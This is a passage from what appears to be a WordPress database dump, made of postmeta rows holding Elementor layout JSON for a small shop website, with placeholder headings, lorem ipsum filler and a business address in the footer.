here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8188,1445,'_elementor_page_assets','a:0:{}'),(8191,1446,'_elementor_edit_mode','builder'),(8192,1446,'_elementor_template_type','wp-page'),(8193,1446,'_elementor_version','3.7.7'),(8194,1446,'_wp_page_template','elementor_canvas'),(8195,1446,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8196,1446,'_elementor_page_assets','a:0:{}'),(8198,1447,'_elementor_edit_mode','builder'),(8199,1447,'_elementor_template_type','wp-page'),(8200,1447,'_elementor_version','3.7.7'),(8201,1447,'_wp_page_template','elementor_canvas'),(8202,1447,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 